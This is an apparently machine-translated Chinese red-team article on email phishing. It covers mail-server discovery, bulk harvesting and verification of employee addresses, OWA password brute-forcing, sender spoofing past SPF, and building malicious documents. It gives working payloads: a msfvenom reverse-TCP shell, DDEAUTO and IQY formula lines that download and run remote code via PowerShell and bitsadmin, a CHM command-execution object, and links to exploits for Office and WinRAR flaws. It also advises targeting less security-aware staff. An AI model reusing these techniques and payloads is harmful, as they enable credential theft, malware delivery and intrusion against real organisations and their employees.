Article Directory
#This article is reproduced in Jiuxian No.6 Unit. If there is any inconvenience, please practice and delete it immediately.
With the rapid development of Internet information, office work is inseparable from the support of the network. Mailbox has become one of the common office methods.
This article mainly starts from the premise of information collection as the first step, and gradually extends to the direction of email phishing, including: information spying, information verification, mailbox location, content forgery, document forgery and other aspects.
During the penetration test, it is also a common way to use the mailbox management method to carry out the battlefield "earth work" method to dig into the opponent's interior a little bit.
This step is an important step in penetration testing. It is more likely to try this action when the system has no loopholes or any clues. The attacker's heart will always feel that this combination of information collection + email phishing can play the so-called "fish that slip through the net".
Find the target open mail service port and web-side mailbox entry
(1) Find the entrance by scanning section c
When we get the target website, we must first find his real IP address from the MX record domain name (some targets may be third-party mail servers, in this case mx records are useless); when we get the target When using a website, first find his real ip address from the MX record domain name (some targets may be third-party mail servers, in this case mx records are useless); then scan the c segment of this ip address ( 25, 109, 110, 143, 465, 995, 993 ports), under normal circumstances, it is easy to find the target mail server entrance.
(2) Find the mail entry by scanning the subdomain name
There are many tools for scanning subdomains, such as Sublist3r, TeeMO, LangSrcCurise, and Excavator.
(3) Crawling through search engines
Google hack search;
Baidu, Sogou, 360, bing.
site:target.com intitle:“Outlook Web App”
site:target.com intitle:“mail”
site:target.com intitle:“webmail”
Shodan, fofa, zoomeye search, etc.
Some conventional ways to collect target mailboxes in batches
https://hunter.io/
http://www.skymem.info/
https://www.email-format.com/i/search/
This Timo tool also has the ability to collect related domain name mailboxes.
https://github.com/bit4woo/teemo
also has ways to search mailboxes from search engines, spatial search engines, social networking, recruitment websites, etc.
https://github.com/laramies/theHarvester
This tool integrates many APIs by default, and we can easily and quickly grab target mailboxes in batches through these interfaces. Because the apis are all default, some are not filled in, so the results are relatively few, so in the actual combat process, cooperate with other tools to search, and then combine and summarize the final query results.
python3 theHarvester.py -d xxx.com -l 1000 -b all -f test.html
Verify email
After collecting the mailboxes, we need to verify the mailboxes, because some mailbox target company personnel have already given up or used them (resignation, job transfer, etc.).
(1) You can check whether the email address exists through mailtester.com.
https://mailtester.com/testmail.php
(2) The verifyemail tool can verify emails in batches.
https://github.com/Tzeross/verifyemail
(3) mailtester.py
This tool can automatically combine email addresses and then verify one by one according to the result of the combination.
The advantage of the script is that it will assemble and combine at will according to the names in First / Last Name, and then verify them one by one.
When we are enumerating mailbox users, try to find as many dictionaries as possible, such as Chinese pinyin, letter abbreviations top100, 1000, 10000, here we need more harpoons, one more mailbox is more successful rate.
Of course, we can extract the people who are suspected of network administrators, operation and maintenance personnel, and security departments. These people write to their mailboxes alone or do not send them. Because these people have relatively high security awareness, they are easy to get started. We need to protect some non-technical employees People with weak consciousness start, pick soft persimmons and pinch
Here you can cooperate with this website https://www.aies.cn/pinyin.htm according to the collected target information to develop a corresponding name dictionary for combination.
Mailbox blasting
This method of weak password blasting is only applicable to the target company’s own mail server, such as owa, etc. Mailboxes like Baidu, Tencent, Ali, Netease, etc. are not prioritized.
The tools used are medusa, hydra, SNETCracker, APT34 organization owa blasting tool, etc.
In addition, the email user name and password often use the company abbreviation +2019, 2020 and other social worker passwords. One more dictionary will increase the success rate.
Forgery of mailboxes
. Under normal circumstances, if there is no SPF, you can directly use swaps for forgery.
Here is a brief talk about spf and dkim.
SPF: It can be roughly understood that its function is to confirm whether the ip address of the email is in the spf record of its domain name. If it is, it means a correct email, otherwise it will be discarded.
DKIM: Its main function is to verify whether the email data has been modified during transmission. It can also be simply understood as ensuring the integrity of the email during the sending process.
In the case of SPF, you need to bypass SPF, you can use swaps+smtp2go, you need to use the mail hosting platform to bypass SPF monitoring.
SMTP2GO configuration:
Need to create an account and verify the domain name
swaks --to [email protected]
–from [email protected]
–ehlo xxx
–body “hello ,i’m 007"
–server mail.smtp2go.com -p 2525 -au user -ap pass
Below the email address will appear on behalf of the xxx platform, of course, people who do not look carefully or do not understand the technology are easy to be fooled.
Another method can also save eml format files.
Delete the field before from and modify the To field mailbox.
swaks --to test.163.com
–from [email protected]
–data 1.eml --h-from
–server mail.smtp2go.com -p 2525 -au user -ap pass
Fishing document production
1) Traditional macro file
2) CHM fishing
Create a new folder and copy the following code to index.html, and then EasyCHM tool can generate it.
Here is a pop-up calculator that can be replaced by our Trojan horse.
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=", calc.exe">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>
After generation, give a name that is easy to get hooked on.
3)CVE-2018-2174
exp address:
https://github.com/0x09AL/CVE-2018-8174-msf.git
4) Windows shortcut keys
First use MSF to generate a payload:
msfvenom -p windows/meterpreter/reverse_tcp lhost=vpsip lport=1234 -f msi > shell.txt
msiexec.exe, the system process, is a part of Windows Installer. Using this process to load our shellcode can achieve a certain circumvention effect.
Of course, the method is not unique, and there are many other ways, such as using powershell to remotely download and execute your own Trojan.
5) Construct DDE phishing documents
Create a document, then double-click to open dde.docx, directly Ctrl + f9 shortcut key can quickly help create a domain, we only need to add the following instructions in the curly brackets (a calculator pops up), we can be loaded remotely during actual combat Trojan horse.
DDEAUTO c:\windows\system32\cmd.exe “/k calc.exe”
DDEAUTO "C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden IEX (New-Object System.Net.WebClient).DownloadString('http://xx.xx.xx.xx/1.ps1'); # " "Microsoft Document Security Add-On"
Go online after clicking.
6) Inserting an external object (OLE) method in word to deceive
Click to go online.
7) IQY feature fishing
Using Out-WebQuery.ps1 under nishang, the script generates an iqy file containing the malicious payload url.
powershell –exec bypass –Command "& {Import-Module 'C:\Epic\nishang-master\Client\Out-WebQuery.ps1';Out-WebQuery -URL http://192.168.1.5/iqy.html}"
Write in the iqy.html page:
=cmd|' /c bitsadmin /transfer c6c5 http://ip:port/a %APPDATA%\c6c5.exe&%APPDATA%\c6c5.exe&del %APPDATA%\c6c5.exe '!A0
Bitsadmin transmission is really slow...
In addition to phishing, this feature can also be used to steal sensitive information such as the account password of the target user.
8) PPT action button feature structure PPSX fishing
Since my HTA is online here, it may be due to the system version that there is always a problem, so I use hta to load ps, and then use ps to remotely load and execute the specified cs horse.
It must be saved in ppsx format here.
9) RAR decompression fishing
WinRAR vulnerability exp:
https://github.com/WyAtu/CVE-2018-20250
Generated and sent to the target machine for decompression. Since the temporary demonstration did not perform anti-virus processing, the horse was intercepted by Tinder after restarting the machine.
In addition, there are also the use of the phishing page of the target login port to steal various, VPN, Mail, OA, account passwords, etc. The actual red team phishing methods and details are very different.